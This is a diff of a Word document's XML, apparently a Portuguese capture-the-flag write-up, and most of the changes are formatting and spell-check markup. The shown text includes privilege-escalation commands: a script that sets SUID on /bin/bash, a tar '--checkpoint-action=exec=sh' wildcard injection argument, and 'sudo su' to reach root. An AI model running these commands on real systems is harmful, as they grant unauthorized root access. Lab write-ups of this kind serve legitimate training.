+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4520,6 +6358,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Comando usado: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="hljs-builtin"/>
@@ -4531,6 +6370,7 @@
         </w:rPr>
         <w:t>printf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4550,7 +6390,103 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
         </w:rPr>
-        <w:t>'#!/bin/bash\nchmod +s /bin/bash'</w:t>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>nchmod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +s /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4606,6 +6542,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Comando usado: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="hljs-builtin"/>
@@ -4617,6 +6554,7 @@
         </w:rPr>
         <w:t>echo</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4668,7 +6606,79 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
         </w:rPr>
-        <w:t>-checkpoint-action=exec=sh privesc</w:t>
+        <w:t>-checkpoint-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>action</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>exec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> privesc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4714,6 +6724,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="hljs-builtin"/>
@@ -4725,6 +6736,7 @@
         </w:rPr>
         <w:t>echo</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4778,7 +6790,79 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Entre no diretório do miles novamente e execute o comando sudo –su para poder ter acesso root.</w:t>
+        <w:t xml:space="preserve">Entre no diretório do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>miles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> novamente e execute o comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para poder ter acesso root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4814,7 +6898,31 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sudo -l</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4850,8 +6958,45 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sudo su</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5019,7 +7164,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada impossível . </w:t>
+        <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>impossível .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5913,6 +8076,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Fontepargpadro">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabelanormal">

</xml_diff>